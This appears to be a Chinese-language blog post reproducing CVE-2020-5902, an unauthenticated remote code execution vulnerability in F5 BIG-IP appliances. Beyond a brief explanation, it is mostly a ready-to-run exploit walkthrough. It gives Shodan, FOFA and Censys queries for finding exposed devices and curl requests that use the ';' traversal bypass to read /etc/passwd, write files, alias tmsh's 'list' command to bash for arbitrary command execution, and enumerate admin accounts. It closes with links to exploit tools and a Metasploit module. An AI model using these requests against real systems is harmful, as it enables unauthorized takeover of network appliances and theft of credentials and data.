CVE-2020-5902 F5 BIG-IP RCE復現
阿新 • • 發佈:2020-07-31
目錄
簡介
F5 BIG-IP 是美國F5公司一款整合流量管理、DNS、出入站規則、web應用防火牆、web閘道器、負載均衡等功能的應用交付平臺。
漏洞編號:CVE-2020-5902
未授權的遠端攻擊者通過向漏洞頁面傳送特製的請求包,可以造成任意 Java 程式碼執行。進而控制 F5 BIG-IP 的全部功能,包括但不限於: 執行任意系統命令、開啟/禁用服務、建立/刪除伺服器端檔案等。該漏洞影響控制面板受影響,不影響資料面板。
影響版本
BIG-IP 15.x: 15.1.0/15.0.0
BIG-IP 14.x: 14.1.0 ~ 14.1.2
BIG-IP 13.x: 13.1.0 ~ 13.1.3
BIG-IP 12.x: 12.1.0 ~ 12.1.5
BIG-IP 11.x: 11.6.1 ~ 11.6.5
搜尋語法
shodan
http.favicon.hash:-335242539
http.title:"BIG-IP®- Redirect"
fofa
title="BIG-IP®- Redirect"
censys
443.https.get.body_sha256:5d78eb6fa93b995f9a39f90b6fb32f016e80dbcda8eb71a17994678692585ee5
443.https.get.title:"BIG-IP®- Redirect"
原理解析
https://mp.weixin.qq.com/s/JnI4f3R5JZqhLFv_fTQ_0A
概述:當後臺程式使用getRequestURI()或getRequestURL()函式來解析使用者請求的URL時,若URL中包含了一些特殊符號,則可能會造成訪問限制繞過的安全風險。本次漏洞利用
;
繞過許可權認證,無需登入即可訪問某些頁面,使用其功能
手動復現
利用分號;
繞過許可權認證
fileRead.jsp讀檔案
fileSave.jsp寫檔案
tmshCmd.jsp執行tm命令
- 讀檔案
https://host:port/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd
curl -k "https://host:port/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd"
- 寫檔案
https://host:port/tmui/login.jsp/..;/tmui/locallb/workspace/fileSave.jsp
POST:fileName=/tmp/1.txt&content=CVE-2020-5902
- 命令執行
- 執行任意命令
修改alias劫持list命令為bash
curl -k "https://host:port/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=create+cli+alias+private+list+command+bash"
把執行的命令寫入檔案,路徑fileName,內容content,考慮符號問題,建議用burp寫入
curl -k "https://host:port/tmui/login.jsp/..;/tmui/locallb/workspace/fileSave.jsp?fileName=/tmp/test&content=id"
執行檔案的命令,若返回為空,則先執行一次第一步,再執行此步
curl -k "https://host:port/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=list+/tmp/test"
還原list命令
curl -k "https://host:port/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=delete+cli+alias+private+list"
- 列出使用者
檢視所有使用者
curl -k "https://host:port/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=list+auth+user"
檢視admin使用者
curl -k "https://host:port/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=list+auth+user+admin"
利用工具
- jas502n師傅
https://github.com/jas502n/CVE-2020-5902 - nmap
https://raw.githubusercontent.com/RootUp/PersonalStuff/master/http-vuln-cve2020-5902.nse - MSF
wget -P /usr/share/metasploit-framework/modules/exploits/linux/http/ https://raw.githubusercontent.com/rapid7/metasploit-framework/0417e88ff24bf05b8874c953bd91600f10186ba4/modules/exploits/linux/http/f5_bigip_tmui_rce.rb
reload_all
exploit/linux/http/f5_bigip_tmui_rce 2020-06-30 excellent Yes F5 BIG-IP TMUI Directory Traversal and File Upload RCE